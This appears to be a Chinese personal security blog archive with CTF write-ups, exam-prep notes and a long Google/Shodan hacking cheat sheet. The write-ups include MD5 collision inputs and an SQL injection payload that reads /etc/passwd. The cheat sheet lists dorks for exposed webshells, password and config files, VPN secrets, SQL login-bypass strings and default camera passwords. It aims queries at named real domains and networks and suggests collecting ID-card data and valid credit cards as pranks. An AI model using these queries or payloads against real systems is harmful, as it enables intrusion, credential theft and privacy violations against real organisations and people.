作者： <span>harmoc</span>

Write up

DDCTF_201…

2018年4月24日2018年6月4日
by harmoc

杂谈

觉得自己根本没有资格写这份Write up。这次DDCTF打的心态真的有点崩。不过还好，意识到自己很多地方的不足。
直到考研结束，我不会再头铁地去打什么CTF。更何况，本身自己就需要积淀。

MISC

1.(╯°□°）╯︵ ┻━┻

（掀起了没技术的桌子)

题面

(╯°□°）╯︵ ┻━┻

d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb7b9b8e4b5b5e4e2b7b6b5b5b2e1b9b2b2e4b0b0e4b7b7b5e5b3b3b1b1b9b0b7fd

题解

感觉这道题大家说法好像不太一样？
有的人是说跑的移位加密，有的说（比如我）直接16转10，然后128取余？
密码学体系不完善。。。。。

第四扩展FS

题面

D公司正在调查一起内部数据泄露事件，锁定嫌疑人小明，取证人员从小明手机中获取了一张图片引起了怀疑。这是一道送分题，提示已经在题目里，日常违规审计中频次有时候非常重要。

题解

这道题感觉是真的迷。我最终做出来一点题目的名字没用上。
一开始第一反应binwalk一下。结果解出的压缩包损坏。卡的死死的，到现在不知道到底什么原因，为什么其他表哥的解出来就是正常的。
后来用了foremost解出了压缩包。但是有密码，在详细信息里发现了一个很可疑的字符串Pactera，用作密码一试。。。开了。

然后就是根据提示里字频解密码了

安全流量

数据包内容很驳杂，别的不说，我满怀期望读了7封广告邮件，简直了。

在数据包内会有一个.eml文件，里面有一张关键图片----私钥。

然后把私钥格式补齐，用wireshark进行ssl解密即可获取flag。

然而我第一次知道这个操作。。。。。大佬们wireshark的操作到底咋系统学到的？我咋打一次比赛学一个新操作。
QAQ

安全通信

题面：

请通过nc XXXX.XXXX.XXXX.XXXX XXXX答题，mission key是b9ba15b341c847c8beba85273f9b7f90，agent id随意填就可以

题解：

从这儿开始我就没做出来了。。。

分析代码得知，该题为aes ecb加密。

#ecb什么鬼啊！！！摔。看来我密码学也不成体系。。。

1.本题通过输入agent_id,构造形如

Connection for mission: {agent_id}, your mission's flag is: DDCTF{32位}的字符串，

用随机生成的16位密钥进行加密，在一次连接中密钥不会变换

2.因为aes的特性通过改变输入agent_id长度，可以确定flag长度为32位，如下图

3.因为aes特性将字符串16位一组分组，当输入12345678时，字符串多出一位}，分析脚本得知会用0补齐。

4.aes_ecb的特性，最后一组的}和单独输入}加密后一样，得知可以进行爆破，通过改变agent_id长度进行爆破。得到flag

Web

web1-数据库的秘密

没做出来。。找了一份大佬的wp：

看题目猜是注入，访问题目发现只允许 123.232.23.245 IP 访问。没啥好说的，直接改 HTTP 的 HEADERS，加个X-Forwarded-For: 123.232.23.245。发现可以正常访问了，并且注意到有个 hidden 的 input，参数名为 author，是本题的注入点。
为了测试 payload 方便，使用 burp 来修改数据。
proxy->options->match and replace
将useragent替换成X-Forwarded-For: 123.232.23.245
将hidden 替换成 text，将intercept勾上 off
这样就可以在浏览器上直接测试：

稍微 fuzz 下，过滤了 union ，只能使用 and 来盲注。同时提交请求还会带上一个 time 和 sig。这两个参数是在 js 计算出来的。思路很明确，有个盲注，需要计算 sig，和 time。直接使用 python 调用 js 来计算，就比较方便。或者使用 webdriver 来做。

附大佬脚本。。。。

唉，web都没做出来。。愧对web狗的身份。。。

借鉴

web1-Wfox
安全通信- kagar1

总之

先考研。好好学习！

千剑

Google ha…

2018年4月15日2018年6月4日
by harmoc

Google Hacking

intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle

inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl

intext: 从网页中搜索指定的关键字,可专门用它来穿透到漏洞页面等……也可用allintext

filetype: 搜索指定的文件后缀,例如:sql mdb txt bak backup ini zip rar doc xls……

site: 在某个特定的网站内中搜索指定的内容

link: 搜索和该链接有关联连接,比如:友情链接

index of: 找目录遍历会用到

google所支持的一些通配符(建议选择性的用,越精确,就意味着结果越少,这样我们容易漏掉一些目标,毕竟不是正则,我们的最终目的是找到漏洞):

    +   强制包含某个字符进行查询
    -   查询的时候忽略某个字符
    ""  查询的时候精确匹配双引号内的字符
    .   匹配某单个字符进行查询
    *   匹配任意字符进行查询
    |   或者,多个选择,只要有一个关键字匹配上即可

针对目标站点利用样例：

目录遍历漏洞  语法为: site:jiebao8.top intitle:index.of
配置文件泄露  语法为: site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini
数据库文件泄露  site:jiebao8.top ext:sql | ext:dbf | ext:mdb
日志文件泄露 site:jiebao8.top ext:log
备份和历史文件 site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
SQL错误  site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()
7 公开文件信息
site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
8  phpinfo()  site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"

找到可能存在的包含和命令执行类漏洞:

    inurl:footer.inc.php?settings=
    inurl:/pb_inc/admincenter/index.php?page=
    inurl:/pnadmin/categories.inc.php?subpage=
    inurl:/index.php??view=src/sistema/vistas/
    inurl:/edit.php?em=file&filename=
    inurl:/path_to_athena/athena.php?athena_dir= 远程包含
    inurl:/path_to_qnews/q-news.php?id=  远程包含
    inurl:/inc/backend_settings.php?cmd=
    inurl:login.action strus2系列执行漏洞利用
    inurl:php?x=                    inurl:php?open=
inurl:php?visualizar=         inurl:php?pagina=
inurl:php?inc=                 inurl:php?include_file=
inurl:php?page=                inurl:php?pg=
inurl:php?show=                inurl:php?cat=
inurl:php?file=                inurl:php?path_local=
inurl:php?filnavn=            inurl:php?HCL_path=
inurl:php?doc=                 inurl:php?appdir=
inurl:php?phpbb_root_dir=    inurl:php?phpc_root_path=
inurl:php?path_pre=           inurl:php?nic=
inurl:php?sec=                 inurl:php?content=
inurl:php?link=                inurl:php?filename=
inurl:php?dir=                 inurl:php?document=
inurl:index.php?view=         inurl:*.php?locate=
inurl:*.php?place=             inurl:*.php?layout=
inurl:*.php?go=                inurl:*.php?catch=
inurl:*.php?mode=            inurl:*.php?name=
inurl:*.php?loc=             inurl:*.php?f=
inurl:*.php?inf=             inurl:*.php?pg=
inurl:*.php?load=            inurl:*.php?naam=
allinurl:php?page=           allinurl:php?file= 
inurl:php?x=                  inurl:admin.php?cal_dir=
inurl:php?include=           inurl:php?nav=
inurl:*.php?sel=             inurl:php?p=
inurl:php?conf=              inurl:php?prefix=
inurl:theme.php?THEME_DIR= 
inurl:php?lvc_include_dir=  
inurl:php?basepath=          inurl:php?pm_path=
inurl:php?user_inc=          inurl:php?cutepath=
inurl:php?fil_config=        inurl:php?libpach=
inurl:php?pivot_path=        inurl:php?rep=
inurl:php?conteudo=          inurl:php?root=
inurl:php?configFile         inurl:php?pageurl
inurl:php?inter_url          inurl:php?url=
inurl:php?cmd=                inurl:path.php?my=
inurl:php?xlink=              inurl:php?to=
inurl:file.php?disp=

找各类数据库注入:

    inurl:categorysearch.php?indus=
    intext:"樂天台東民宿網" inurl:news_board.php 
    小商城类注入:
            inurl:".php?catid=" intext:"View cart"
            inurl:".php?catid=" intext:"Buy Now"
            inurl:".php?catid=" intext:"add to cart"
            inurl:".php?catid=" intext:"shopping"
            inurl:".php?catid=" intext:"boutique"
            inurl:".php?catid=" intext:"/store/"
            inurl:".php?catid=" intext:"/shop/"
            inurl:".php?catid=" intext:"Toys"
            inurl:details.php?BookID=
            inurl:shop.php?do=part&id=

普通cms类注入:

 inurl:article.php?ID=        inurl:newsDetail.php?id=
 inurl:show.php?id=            inurl:newsone.php?id=
 inurl:news.php?id=            inurl:event.php?id=
 inurl:preview.php?id=        inurl:pages.php?id=
 inurl:main.php?id=            inurl:prod_detail.php?id=
 inurl:view.php?id=            inurl:product.php?id=
 inurl:contact.php?Id=        inurl:display_item.php?id=
 inurl:item.php?id=            inurl:view_items.php?id=
 inurl:details.asp?id=        inurl:profile.asp?id=
 inurl:content.asp?id=        inurl:display_item.asp?id=
 inurl:view_detail.asp?ID=    inurl:section.php?id=
 inurl:theme.php?id=          inurl:produit.php?id=
 inurl:chappies.php?id=       inurl:readnews.php?id=
 inurl:rub.php?idr=           inurl:pop.php?id=
 inurl:person.php?id=         inurl:read.php?id=
 inurl:reagir.php?num=        inurl:staff_id=
 inurl:gallery.php?id=        inurl:humor.php?id=
 inurl:spr.php?id=            inurl:gery.php?id=
 inurl:profile_view.php?id=
 inurl:fellows.php?id=        inurl:ray.php?id=
 inurl:productinfo.php?id=
 inurl:file.php?cont=         inurl:include.php?chapter=
 inurl:principal.php?param=
 inurl:general.php?menue=     inurl:php?pref=
 inurl:nota.php?chapter=      inurl:php?str=
 inurl:php?corpo=               inurl:press.php?*

除了上面这些常规找注入的方式,不妨直接在网页标题或者url中搜sql语句,说不定也会有收获:

intitle:注入常用的一些sql语句,比如:常用的union,substr(),select等等……

批量搜集万能密码(属于注入的一种):

    inurl:"wladmin/login.asp"  
    Username : '=' 'or'
    Password : '=' 'or'

    intext:POWERED BY Versatile Software Services       默认后台/alogin.aspx
    User ==> 'or''='
    Pass ==> 'or''='

    inurl:/media.php?hal=login
    Email: '=''or'@gmail.com
    Pass: '=''or'

    intext:"Powered by : Best Webmasterz." 默认后台/admin
    User : '=' 'OR'
    Pass : '=' 'OR'

    intext:"Web Design and Maintenance by Cloud 5 Solutions" 默认后台/admin/login.php
    User : '=' 'OR'
    Pass : '=' 'OR'

    intext:"网站设计：火龙科技" 默认后台/maintain/login.php
    Username : '=' 'or'
    Password : '=' 'or'

    intext:"Powered by Moodyworld" 默认后台/admin/
    Username : '=' 'or'
    Password : '=' 'or'

找遗留的各种数据库报错,物理路径,数据库版本,服务器探针类文件等等……:

    site:*.tw  inurl:/phpinfo.php
    filetype:log "PHP Parse error"| "PHP Warning"
    site:*.tw  "id=" & intext:"Warning: mysql_fetch_array()
    site:*.jp  "id=" & intext:"Warning: getimagesize()
    site:*.br  "id=" & intext:"Warning: array_merge()
    site:*.tw  "id=" & intext:"Warning: mysql_fetch_assoc()
    site:*.tw  "id=" & intext:"Warning: mysql_result()
    site:*.jp  "id=" & intext:"Warning: pg_exec()
    site:*.tw  "id=" & intext:"Warning: require()
    inurl:/robots.txt site:*.*

搜集各种账号密码,比如,数据库密码,ftp,vpn,htpasswd,telnet等等……:

    可能会遗留的密码文件:
            inurl:passlist.txt
            inurl:password.txt

    重要配置文件泄露:
            inurl:/application/configs/  配置文件名为/application/configs/application.ini

    htpasswd:
            htpasswd.bak filetype:htpasswd

    vpn(cisco)[为捅内网,做准备]:
            filetype:pcf  "GroupPwd"

    cisco在线密码解密网站:
            https://www.unix-ag.uni-kl.de/~massar/bin/cisco-decode



    ftp:
            "index of/" "ws_ftp.ini" "parent directory"
            "your password is" filetype:log
            filetype:ini inurl:"serv-u.ini"
            filetype:ini inurl:flashFXP.ini
            filetype:ini ServUDaemon
            filetype:ini wcx_ftp
            filetype:ini ws_ftp pwd
            ext:inc "pwd=" "UID="
            auth_user_file.txt
            例如:
                    http://www.cryptoman.com/ftp/
                    http://www.cryptoman.com/ftp/WS_FTP.ini
    其他密码:
            admin account info" filetype:log

批量找目录遍历[上传点,数据库文件下载,phpmyadmin,网站后台及网站各种备份,源代码泄露等同样也可以用这种方式慢慢找]:

    site:*.hk index of /admin
    site:*.hk index of /upfiles
    site:*.hk index of /fckeditor/editor/
    site:*.tw index of /admin/uploadfile
    site:*.tw index of /admin/file
    site:*.tw index of /system/file
    site:*.tw index of /phpmyadmin
    site:*.tw index of /web/backup/
    inurl:/phpmyadmin/index.php site:*.tw

搜同行们的各种工具脚本:

绝大部分人在用别人东西的时候,基本是很少看里面代码的[即使开源],更不要说去除特征及后门,没办法现状如此,大家都很懒,既是如此,就不免要把自己的成果也被迫的共享给别人一份,所以养成良好的读代码习惯,是有必要的。

搜同行的脱裤脚本:

    intitle:登录 - Adminer  这里只是随便举个例子,你可以自己平时多搜集一些境内外常用的脱裤脚本的标题,文件名什么的,慢慢尝试

同样,你也可以用上面这种方式来找下别人的aspx嗅探脚本,例如:

    websniff

找别人遗留的各种webshell,平时注意多搜集一些镜内外常用的大马特征,这里只是随便举几个例子,你可以随意组装自己的:

inurl:b374k.php filetype:php
inurl:c99.php
inurl:c100.php Generation time:
inurl:itsecteam_shell.php
intext:x2300 Locus7Shell v. 1.0a beta Modded by
intext:c99shell inurl:c99.php
powered by Captain Crunch Security Team
"inurl:c99.php" + "intext:safe"
intitle:r57shell
intitle:c99shell +uname
inurl:c99.php uid=0(root)
intitle:c99shell+filetype:php
intitle:ly0kha shell
inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"
"Shell" filetypehp intext:"uname -a:" "EDT 2010"
intitle:"intitle:r57shell"
inurl:"c99.php" & intext:Encoder Tools Proc. 
inurl:"c100.php" & intext:Encoder Tools Proc. 
intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc.

找到目标的owa和vpn入口[内网入口]:

 owa入口:
 inurl:/owa/auth/logon intitle:outlook
 inurl:/owa/auth/logon intext:outlook
vpn入口:
 inurl:/sslvpn site:hk

找些好下手的目标子域:

site:polyu.edu.hk inurl:asp?pid=
site:polyu.edu.hk inurl:aspx?id=
site:polyu.edu.hk inurl:php?id=
site:polyu.edu.hk inurl:jsp?id=
site:polyu.edu.hk inurl:do?id=
site:polyu.edu.hk inurl:cgi?id=

找目标的数据库备份及其他敏感文件目录：

[一般后缀都是sql,mdb,txt……],像数据库和网站备份这种东西,还是建议直接用工具跑比较好,前提字典要自己精心制作:

    filetype:sql inurl:backup inurl:wp-content
    inurl:/eWebEditor/db/ site:*.com

从目标网站上搜集目标邮箱:

    site:*.gov.tw *@gov.tw

不错的google hacking站点:

    https://cxsecurity.com/exploit/  极力推荐此站点,里面已经为我们准备好各种各样的高质量google dorks
    https://www.exploit-db.com/google-hacking-database/ 并不推荐,exp不错,但这方面比较废

其他的一些小恶作剧:

    搜集个人身份证信息
            filetype:xls 身份证 site:cn
    搜集被盗QQ号什么的
    搜集别人还在有效期的信用卡,千万不要干坏事儿,不然会被请去喝茶的……
    还有图片识别,位置识别,谷歌为我提供了很多很强大的功能,有必要的话可以去学习如何使用谷歌的这些api

关于robots.txt文件的作用:

    此文件一般位于网站根目录下,规定了搜索引擎不能爬行的一些目录,一般都是一些敏感目录,比如:后台,数据库连接配置文件,安装目录等等……
    一般我们在试了几个常用的后台目录都不行的情况,习惯性的就会直接去访问下目标的robots.txt文件,很可能这文件里面就存的有后台路径
    但,那只是有可能,不尝试,连可能都没有

shodan和zoomeye

Shodan

shodan 入门[在入侵一些网络设备的时候还是非常好用的,俗称"工控设备渗透"]:
[不像谷歌,bing那样只是单单是基于web爬行,shodan则是基于网络旗标搜索的,我们主要可以用它来碰各种网络设备的默认密码默认只能看到50个结果,可能需要付点费才能看到更多的搜索结果]

官方站点[去注册个账号,必须的]:
https://www.shodan.io/

shodan 内置的几个简单过滤器:
city: 城市,貌似只支持英文
country: 国别,比如:cn,us,jp,tw,br,ph,vn,hk
hostname: 主机名[域名如果是子域还需要在前面加个.]
net: 网络地址范围,可以是单个ip或者cidr格式
os : 操作系统 centOS,win32,red hat,suse 等等
port: 根据端口,HTTP (80),FTP (21),SSH (22),SNMP (161),SIP (5060)等等
product: 具体的产品名称

下面是一些简单的搜索实例:

搜集某个城市的特定设备标识[自己多收集一些常见的软件和设备标识]:

            Microsoft-IIS/5.0 city:"TOKYO"   可以逐个尝试写权限
            Microsoft-IIS/6.0 city:"Seoul"        
            Microsoft-IIS/7.5 city:"Hong Kong"
            apache city:"Nagoya"
            Apache/2.2.27 city:"Nagoya"
            Tomcat city:"Seoul"
            cisco city:"Osaka"
            tplink city:"nanjing"

搜索特定版本操作系统及特定端口:

            os:"linux" net:"72.34.62.0/24"
            os:"windows" net:"195.40.91.0/24"
            Apache city:"Hong Kong" port:"8080"  product:"Apache Tomcat/Coyote JSP engine"
            Apache city:"Seoul" port:"8080"
            hostname:".polyu.edu.hk" os:"windows"

搜索指定国家地域的特定类型软件(还是那句话,多搜集一些软件标识):

            product:"tomcat"  net:"158.132.18.0/24"
            product:"apache"  net:"158.132.18.0/24"
            product:"iis"     net:"158.132.18.0/24"
            port:"8080" jboss country:CN

扫描指定网段的所有数据库服务器:

            product:"Mysql"  net:"140.117.13.0/24" port:"3306"
            port:"1433" net:"78.131.197.0/24"
            port:"5432" net:"77.55.149.0/24"
            port:"1521" net:"78.143.192.0/12"
            port:"1521" city:"Osaka"

搜索远程管理终端:

            os:"windows" port:"3389" net:"107.160.1.0/24"
            os:"linux" port:"22" net:"107.160.1.0/24"
            os:"linux" port:"23" net:"107.160.1.0/24"
            os:"linux" port:"23" net:"87.124.0.0/15"

搜路由:

搜索ftp:

            port:"21" net:"107.160.1.0/24"
            port:"69" net:"218.242.16.0/24"

在某个城市中搜索指定的端口,操作系统及设备:

            city:"Hong Kong" port:"69"
            city:"Hong Kong" port:"3389"
            city:"Hong Kong" port:"22"
            city:"Hong Kong" port:"23"
            city:"Hong Kong" port:"3306"
            city:"Hong Kong" port:"110"
            city:"Hong Kong" os:"windows"
            city:"Hong Kong" product:"cisco"
            city:"Hong Kong" port:"8080"

按照国家进行搜索指定的设备,端口,服务器:

            port:"23" country:CN
            port:"1433" country:CN
            port:"3389" country:CN
            tplink country:CN
            huawei country:CN
            netcam  country:CN
            country:CN net:"115.225.113.0/24" port:"22"
            country:CN router
            admin login  country:HK
            hacked by country:HK

搜集缺省密码:

            "default password" city:"Hong Kong"
            country:CN "default password"

搜exp[其实,就是把exploit上的东西扒下来]:

            https://exploits.shodan.io/welcome

    搜索各类漏洞摄像头:
            netcam net:"187.189.82.0/24"

    批量搜集一些开源程序,尝试0day批量利用:

    下面是一些常见的默认用户名密码,可以撞撞运气:
            ACTi: admin/123456 or Admin/123456
            Axis (traditional): root/pass,
            Axis (new): requires password creation during first login
            Cisco: No default password, requires creation during first login
            Grandstream: admin/admin
            IQinVision: root/system
            Mobotix: admin/meinsm
            Panasonic: admin/12345
            Samsung Electronics: root/root or admin/4321
            Samsung Techwin (old): admin/1111111
            Samsung Techwin (new): admin/4321
            Sony: admin/admin
            TRENDnet: admin/admin
            Toshiba: root/ikwd
            Vivotek: root/<blank>
            WebcamXP: admin/ <blank>

    针对某个端口,批量搜集感染了某种数据标志的木马:

    批量搜集一些经典漏洞,比如:心脏滴血,bash远程执行,等等……:

Zoomeye

ZoomEye快捷键:

显示帮助 shift+/
隐藏该帮助 ESC 
回到首页 shift 
高级搜索 Shift +s 
聚焦搜索框 s

指定搜索的组件以及版本

app：组件名称

ver：组件版本

例如：搜索 apache组件版本2.4

app:apache ver:2.4

指定搜索的端口

port:端口号

例如：搜索开放了SSH端口的主机

port:22
一些服务器可能监听了非标准的端口。要按照更精确的协议进行检索，可以使用service进行过滤。

指定搜索的操作系统

OS:操作系统名称

例如：搜索Linux操作系统

OS：Linux

指定搜索的服务

service：服务名称

例如，搜素SSH服务

Service：SSH

指定搜索的地理位置范

country：国家名

city：城市名

例如：

country:China

city：Beijing

搜索指定的CIDR网段

CIDR:网段区域

例如：

CIDR：192.168.158.12/24

搜索指定的网站域名

Site:网站域名

例如：

site:www.baidu.com

搜索指定的主机名

Hostname:主机名

例如：

hostname:zwl.cuit.edu.cn

搜索指定的设备名

Device：设备名

例如：

device:router

搜索具有特定首页关键词的主机:

Keyword：关键词

例如：

keyword:technology

文章参考

T00ls 熟练利用google,shodan及bing hacking辅助快速渗透[主要针对大型目标]
https://www.t00ls.net/viewthread.php?tid=38850&highlight=google%2Bhack

信息收集利器：ZoomEye
http://www.freebuf.com/sectool/163782.html

随记

知识与攻击

2018年4月11日2018年6月4日
by harmoc

知识面，决定看到的攻击面有多广。

知识链，决定发动的杀伤链有多深。

前事

学长学姐传授的考研…

2018年4月10日2018年6月4日
by harmoc

数学

学长C：
跟的张宇；19考研数学会简单些；数学的话就是认真吧；视频只看了基础班和提高班，看的多不太重要，看明白比较重要，可以记个笔记；一开始不要选太难的题，解析一定要详细；线代概率论跟的李永乐两小本书；历年的题目在线代和概率论上的套路一样，主要是高数比较棘手；后期做1000题和真题吧，1000题我就做完了高数，其他两门选择做一做；真题一定要好好对待；找早上几个小时掐点做；真题的错题反复看，做到比较熟练就行；8套卷和冲刺四套卷，比较难，可以练练手；
学长W：
数学我能给你的经验就是千万别写串答题卡；数学一共两张答题卡，第一张正反面，第二张只有正面，到时候贴上条码就按顺序放好
（诫之，学长的经验里有故事）
数学问题一定看到就要解决，不要抱有侥幸心理，觉得考试不考就过去。
学姐Y：
我数学看的张宇的视频，然后就刷题。；我看完强化了，冲刺没看。
学长L：
题推荐你汤家凤1800，过完一遍知识点后接着做它，只做基础部分，思路就比较清楚了。；再就是一定重视真题的错题，我最后一个月就只反复看真题的错题。；我觉得重在自己总结，错题也好，做题技巧也好，自己总结一下收获会很大。

英语

学姐Y：
英语看的朱伟的恋练有词；看了点儿写作的视频，然后练阅读；你要有老师的话，可以练些作文。；（恋练有词）看这个背的快啊，看过一遍基本就背下来了，自己背背不下去，而且会讲些长难句。看完理解长难句也好多了，我觉得挺有用的，这个还蛮推荐你看的。
学长L：
刷真题；阅读理解；达到每一篇文章的所有单词都认识的程度；真题，其他的的根本不用做，模拟题多多少少偏一点；1997开始就行；曾鸣张剑的黄皮书就挺好，我一直用那个，他这个书每一篇都有分析；

政治

学姐Y
肖秀荣你知道吗；主要是预测的那四套卷，一定要看；其他也是跟着视频学。

计算机

学长C：
四本王道；针对408的，803也适用，那本书看明白就差不多了。；存储器那里操作系统比较详细。
学姐Y：
专业课我看的王道四本书。

场外问题

学长W：
我觉得反正还是主要是心态问题，复习的心态还有考试的心态，都要调整好。别的，专心复习，就行了。
学长L：
但你得根据你自己找合适的学习方法；主要还是得重视两门150的课

总之

非常感谢学长学姐的经验，对照学长学姐的经验，修正了自己略显低效的一些学习方式。增加了一些新姿势。
一定要成为他们的真正学弟~~~

个人规划：

数学，汤家凤基础班，张宇强化班，过一遍数学全书，后期刷题。汤家凤1800作为首要备选。
英语，看一看恋练有词。自大一以来养成的背单词习惯，应该会起一定作用。单词要继续坚持，当下开始做97往后的考研真题，记忆其中生词。
803：王道为主，《算法导论》、《深入理解计算机系统》、《计算机网络（自顶向下方法）》作为深入理解参考。
政治：高联政治暑期，肖秀荣。

Write up

强网杯Wirte …

2018年3月27日2018年6月4日
by harmoc

这次强网杯打的可以说是一败涂地了。

比赛之前踌躇满志，要全心全意肝上两天。结果总是做着做着做不下去。

闲鱼。

MISC

Welcome

题目是一个bmp文件，因为之前没做过bmp文件的隐写。所以一上来就有一点懵。最初以为是LSB隐写，翻了几遍也没有什么有效信息，然后尝试extra data，亦未果。最后试了offset，结果在100位时出了flag。

此题总结：

此题解答过程中思考混乱，不能理性分析。
对stegsolve的了解不够深入，应当了解每一个选项的具体使用以及应用环境。

ai-nimals

本来以为自己能解出来这道题的，结果果然自己机器学习学的还不行，tensorflow了解还不足。。比赛时候也不愿意静下心来好好学。其实CTF的过程中完全可以学到足以作出来这道题。。

1.题目给了一个py脚本，读脚本可知，用base64加密图片，传给服务器。判断和原图是否相同，长度必须相同，里面内容最多有config.diff_chars不同，hint中config.diff_chars的值为1024。接着利用tensorflow训练的一个模型来判断，图片中是何种动物，训练的模型给了一个GitHub地址。

2.判断是否输出的条件为if top_k[0] == 1:，根据在本机训练模型试验的结果，意思是：判断是否为狗的几率最大，就输出flag。显然与题目本意不同，所以我们只需要将给我们的原图base64之后发过去就好了。

3.发包过去的时候要注意，不能一次性全部发过去，否则会出错，所以我们每次发送1024，发一个包暂停0.5秒，最后即可得到flag。（如果出错，重试几次就好）脚本如下：

Web

Web签到

这题是一个md5及相关特性的考察。

第一层：

查看源码，见注释如下：

<!--
    if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
            die("success!");
    }
-->

MD5弱类型罢了，payload：

param1=240610708&param2=QNKCDZO

第二层：

<!--
    if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
            die("success!");
        }
-->

这里我是从精灵表哥的blog那里看到过，因为md5传入数组是会回传两个相同的md5值，所以payload：

param1[]=1&param2[]=2

第三层：

强制字符串转化：

<!--
    if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
            die("success!);
        }
-->

只能md5碰撞了。
碰撞好之后，我死在了怎么传上去上。
我真傻，真的。我只知道要用URlencode，却不知道什么样形式传上去才能让md5相等。做着做着发现被队友解出来了。。。。

后来知道了好几种传的方式：

burpsuite 文件上传了解一下~
传URLencode后的二进制啊！！！！
在网上找别人碰撞好的encode啊！！！之后才知道去年BKPCTF有类似的题。

payload：

Param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

Param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

我真傻，真的。

此题总结：
burpsuite用的不熟练。
也是够了。连burp上传文件都不知道。

Three hit

这题直接没看懂。。。太菜。

看大佬说，这是tm个盲注。
要测试各个字段

发现username有正则限制，那么测试age，发现必须整数，这里可以用16进制绕过，测试一番后发现是个盲注

无力吐槽自己，脚本：

此题总结：

测试意识不足。说起来，自己对SQL注入太不精通了吧。就会打个分号，跑个sqlmap。

Python is the best language 1

flask审计题。

然而我玩了半天留言板。。。。

本来猜XSS，结果XSS能直接发出去，不是。

留言功能关键代码：

class PostForm(FlaskForm):
    post = StringField('Say something', validators=[DataRequired()])
    submit = SubmitField('Submit')

这里直接接受post参数,然后查看是如何添加到数据库的

form = PostForm()
    if form.validate_on_submit():
        res = mysql.Add("post", ['NULL', "'%s'" % form.post.data,
                                 "'%s'" % current_user.id, "'%s'" % now()])

跳转到Add定义处

def Add(self, tablename, values):
        sql = "insert into " + tablename + " "
        sql += "values ("
        sql += "".join(i + "," for i in values)[:-1]
        sql += ")"
        try:
            self.db_session.execute(sql)
            self.db_session.commit()
            return 1
        except:
            return 0

看到这里发现并没有进行任何过滤，存在一个insert注入。

payload

123456',1,'2018-03-24T21:44:39Z'),(NULL,(select conv(hex(substr(load_file('/etc/passwd'),1,6)),16,10)),2,'2018-03-24T21:44:39Z')#

Crypto

Streamgame1

题目给了一个加密算法和一个key文件，根据题目名提示，查了一下是什么流加密，最终也没把算法逆向出来。结果给队友爆破出来了。

题面：

因为确实也只有2**19种可能性，很多表哥都是直接爆破的，贴一个风吹雨表哥的爆破脚本。。

总结

打CTF的方法是不是错了呢，我一直注重的是套路学习。但其实可能并不是这样，打比赛就是考的学习能力啊。看写Threehit 和 Pyhon1的write up的大佬说：

其实是一个很简单的注入，对于flask的理解其实并不是很高，只要学习个几个小时就足以应付这道题，所以对于这道题来说不会flask并不是做不出来的理由，这就表示我们不能总是把希望寄托于CTF竞赛中总会出我们见过的套路，善于学习才是提高CTF竞赛能力的最快捷径。

确实很有道理，CTF是一个学习的过程。
一定要记住这个。

题目writeup参考：

Three hit：Pupil-XDSEC
Python is the best language 1：Pupil-XDSEC
stream1：风吹雨
ai-nimals：Xp0int Team

随笔

年度总结

2018年2月15日2018年6月4日
by harmoc

听着热闹的春晚，和朋友们聊着天，看着bilibili拜年祭，决定写一写我的这一年。

按月份、按学期来想总归不大清晰。想从我的喜欢说起。

我喜欢音乐，尤其是古典乐。喜欢计算机的知识，网络安全特为尤甚。喜欢过，现在都很好。喜欢着二次元，但不喜欢宅这个群体。

今年年初，嗯，应当是年初，2017.2.14接触了白色相簿2。大概是带给我影响最深的一个二次元事物了。一段时间来的压力，压抑，喜欢，焦虑，全都在这个契机下开始爆发，衍生了长达几个月的抑郁期。回头想来，那段时间真的太惨，太不健康了。

对二次元的喜欢大概也从这个时期开始。开始追追番，看看视频。还是很喜欢的。写了点文章，加入了知乎白学圈。虽然在群里不常说话，但接触各种各样的优秀的人总感觉很幸运。

这一年，最重要的大概是找到了我打算倾半生之力去了解，去学习的领域--网络安全。这一年，也算做了很多折腾，渐渐算是入了门，算是个弱弱的Web狗了吧。难受的一点是，眼睁睁地看着学习时间比自己短得多的人远远的超过自己。何其难过。

上半年时，教过几节口琴课，用自己的爱好赚了点钱。算是起步吧。在bilibili投了稿。我会把口琴一直带着的。今年算是真正系统的听古典乐，才了解到音乐的美妙。有些时候，音乐的传递要高于语言。

这年，总结的最大缺陷莫不是眼高手低。看着别人优秀，却只知焦虑，只知羡慕，不肯沉下心好好学习，如此以往，何事可成？戒之，戒之。争渡，争渡。

最优秀的品质莫过于清醒，莫过于不自欺。当持之以恒。

今年思考的产物：人活着，无不是为了寻求自己对自己的认同感。

随记

焦虑性拖延

2018年1月2日2018年6月4日
by harmoc

一个段子，大致是这样：当有一个deadline是十天后的任务时，前九天我轻松地玩手机，最后一天的前23小时零59秒紧张地玩手机，最后一秒用来眼前一黑。
